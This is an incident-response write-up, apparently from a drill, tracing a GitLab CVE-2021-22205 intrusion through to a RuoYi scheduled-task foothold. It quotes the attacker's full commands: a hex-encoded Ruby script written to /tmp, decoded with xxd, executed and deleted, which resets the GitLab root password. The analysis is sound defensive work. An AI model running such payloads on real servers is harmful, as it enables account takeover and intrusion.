AI 助理
备案控制台
开发者社区 云原生 文章 正文

记一次gitlab应急响应

2023-06-25 257
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 记一次gitlab应急响应

01 事件背景介绍



某内部应急演练中,态势感知平台上出现gitlab RCE漏洞攻击成功告警,现需根据流量情况进行安全事件分析。


02 事件分析过程

根据态势感知平台,确认发起攻击的IP地址,以该地址为源地址进行搜索,寻找攻击痕迹及路径。通过流量分析,判断攻击者首先尝试使用弱口令登陆gitlab,从响应状态判断弱口令没有登陆成功。

image.png

在后续的流量发现存在422响应包,进一步分析攻击者使用gitlab RCE漏洞(CVE-2021-22205)对80.X.X.60成功发起攻击:

image.png

攻击者写入恶意脚本/tmp/.JARRLTW.rb,并执行,成功执行后删除脚本

echo -n 72657175697265202779616d6c270a7265717569726520277067270a636f6e666967203d2059414d4c3a3a6c6f61645f6669 >> /tmp/.JARRLTW.rb
echo -n 6c6528272f7661722f6f70742f6769746c61622f6769746c61622d7261696c732f6574632f64617461626173652e796d6c27 >> /tmp/.JARRLTW.rb
echo -n 295b2770726f64756374696f6e275d0a636f6e6e203d2050472e636f6e6e65637428636f6e6669675b27686f7374275d2c20 >> /tmp/.JARRLTW.rb
echo -n 636f6e6669675b27706f7274275d2c2027272c2027272c20636f6e6669675b276461746162617365275d2c20636f6e666967 >> /tmp/.JARRLTW.rb
echo -n 5b27757365726e616d65275d2c20636f6e6669675b2770617373776f7264275d290a636f6e6e2e6578656328277570646174 >> /tmp/.JARRLTW.rb
echo -n 652075736572732073657420636f6e6669726d6174696f6e5f746f6b656e3d2873656c65637420656e637279707465645f70 >> /tmp/.JARRLTW.rb
echo -n 617373776f72642066726f6d20757365727320776865726520757365726e616d653d5c27726f6f745c27292c656e63727970 >> /tmp/.JARRLTW.rb
echo -n 7465645f70617373776f72643d5c272432612431302436386857326461516b544678614c5478663538427a75744c54414263 >> /tmp/.JARRLTW.rb
echo -n 456264506e633058324451522f4d6946306658744157344f475c272c73746174653d5c276163746976655c27207768657265 >> /tmp/.JARRLTW.rb
echo -n 20757365726e616d653d5c27726f6f745c273b2729 >> /tmp/.JARRLTW.rb
cat /tmp/.JARRLTW.rb | xxd -r -p | tee /tmp/.JARRLTW.rb
/opt/gitlab/embedded/bin/ruby /tmp/.JARRLTW.rb
/usr/bin/rm -rf /tmp/.JARRLTW.rb

还原脚本,具体代码如下图所示

image.png

该脚本更改了gitlab root用户的密码,从302状态码看,攻击者成功利用修改后的密码登陆了gitlab。

image.png

流量记录显示,攻击者存在翻阅源码行为:

image.png

攻击者找到仓库中ruoyi的配置文件,了解到ruoyi登录认证信息;

image.png

image.png


攻击者登录rouyi并添加定时任务:请求并执行恶意jar包

image.png

image.png


通过微步情报在线,进一步确认IP为攻击者IP

image.png



03 事件分析结果



攻击者10.X.X.2利用gitlab RCE漏洞(CVE-2021-22205)写入恶意脚本,修改GitLab root密码,登录后在仓库中翻阅源码找到rouyi配置文件从而成功登录位于50.X.X.40的rouyi并设置定时任务获取远程恶意类命令执行。

04 安全加固建议


1、在安全设备上,如防火墙、IDS上封禁攻击IP:10.X.X.2。

2、 针对本次失陷主机50.X.X.40,进行网络隔离,排查入侵痕迹和内网横向情况,修复gitlab RCE漏洞。

3、重新修改rouyi配置文件,确保配置信息符合安全要求。

文章标签:
Java
网络安全
数据安全/隐私保护
安全
Vista_AX
目录
相关文章
季风泯灭的季节
|
存储 安全 算法
【接口加密】Java中的接口加密实践
【接口加密】Java中的接口加密实践
季风泯灭的季节
839 1
CTO技术共享
|
存储 监控 安全
Zabbix登录绕过漏洞复现(CVE-2022-23131)
最近在复现zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。
CTO技术共享
2069 0
Zabbix登录绕过漏洞复现(CVE-2022-23131)
丰宝宝
|
搜索推荐 开发者 UED
技术与艺术的碰撞:探索软件开发中的美学##
【10月更文挑战第29天】 在本文中,我们将探讨软件开发不仅是一种技术实践,更是一门艺术。通过分析软件设计、用户体验和代码质量的重要性,本文旨在揭示如何在编程过程中融入美学元素,从而提升软件的整体质量和用户满意度。 ##
丰宝宝
202 4
阿里云云原生
|
人工智能 IDE 测试技术
一文教会你如何用好通义灵码,让这款 AI 编码工具帮你做更多工作,更高效
如何用好通义灵码?欢迎收藏最佳使用指南。本文提供通义灵码使用指南,涵盖快捷键、配置调整、跨文件索引及上下文管理等内容,帮助用户更高效地使用通义灵码。
阿里云云原生
9479 4
FrancekChen
|
机器学习/深度学习 分布式计算 算法
【大数据分析&机器学习】分布式机器学习
本文主要介绍分布式机器学习基础知识,并介绍主流的分布式机器学习框架,结合实例介绍一些机器学习算法。
FrancekChen
1525 6
delacroix_xu-15509
|
10月前
|
机器学习/深度学习 监控 Linux
ollama+openwebui本地部署deepseek 7b
Ollama是一个开源平台,用于本地部署和管理大型语言模型(LLMs),简化了模型的训练、部署与监控过程,并支持多种机器学习框架。用户可以通过简单的命令行操作完成模型的安装与运行,如下载指定模型并启动交互式会话。对于环境配置,Ollama提供了灵活的环境变量设置,以适应不同的服务器需求。结合Open WebUI,一个自托管且功能丰富的Web界面,用户可以更便捷地管理和使用这些大模型,即使在完全离线的环境中也能顺利操作。此外,通过配置特定环境变量,解决了国内访问限制的问题,例如使用镜像站来替代无法直接访问的服务。
delacroix_xu-15509
2269 9
尹正杰
|
Ubuntu 数据安全/隐私保护
Ubuntu22.04LTS环境部署实战
这篇文章提供了Ubuntu 22.04 LTS操作系统的详细安装步骤,包括选择语言、键盘布局、网络配置、软件源设置、磁盘分区、安装OpenSSH服务以及完成安装和首次登录系统的过程。
尹正杰
904 6
Ubuntu22.04LTS环境部署实战
一个物联网卡发烧友
|
数据安全/隐私保护 Android开发 iOS开发
如何设置APN
设置APN(接入点名称,Access Point Name)是连接互联网或特定网络服务(如彩信、移动数据等)时,设备需要配置的一个重要参数。不同的手机操作系统(如Android、iOS)和不同的移动网络提供商(如中国移动、中国联通、中国电信等)可能有不同的设置步骤。以下是一些基本的步骤和注意事项,用于设置APN:
一个物联网卡发烧友
3939 3
霍格沃兹测试开发muller老师
|
Ubuntu Docker 容器
最详细的ubuntu 安装 docker教程
最详细的ubuntu 安装 docker教程
霍格沃兹测试开发muller老师
52666 3
Jay17
|
应用服务中间件 PHP nginx
CVE-2019-11043 复现
CVE-2019-11043 复现
Jay17
338 5

云原生

热门文章

最新文章

  • 1
    Docker CE 镜像源站
  • 2
    Minikube - Kubernetes本地实验环境
  • 3
    微服务架构的理论基础 - 康威定律
  • 4
    Docker的Windows容器初体验
  • 5
    Docker学习路线图 (持续更新中)
  • 6
    谈谈 Docker Volume 之权限管理(一)
  • 7
    容器镜像服务 Docker镜像的基本使用
  • 8
    微服务选择Spring Cloud还是Dubbo?
  • 9
    阿里云容器服务新建集群优化方案
  • 10
    3分钟,了解阿里云热门产品 ZooKeeper
  • 1
    开源项目分享 : Gitee热榜项目 2025-12-13 日榜
    33
  • 2
    架构级拆解:AI数字人与数字员工的核心差异,玄晶引擎云原生实践启示
    40
  • 3
    【Azure Developer】中国区Azure环境中查看用户账号是否可用(accountEnabled)的操作步骤
    23
  • 4
    开箱即用的 GoWind Admin|风行,企业级前后端一体中后台框架:基于 Ent 从零实现新服务
    29
  • 5
    开箱即用的 GoWind Admin|风行,企业级前后端一体中后台框架:基于 GORM 从零实现新服务
    30
  • 6
    一文带你玩转 WebSocket 全链路可观测
    30
  • 7
    阿里云 Serverless 计算 11 月产品动态
    23
  • 8
    阿里云 ESA “函数和Pages”全面开放|打通开发者“最后一公里”!
    47
  • 9
    阿里云 Serverless 计算 11 月产品动态
    22
  • 10
    AgentScope Java 首播来啦
    29

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    「直播预告」Streaming Lakehouse Meetup EP.2|Paimon × StarRocks 共话实时湖仓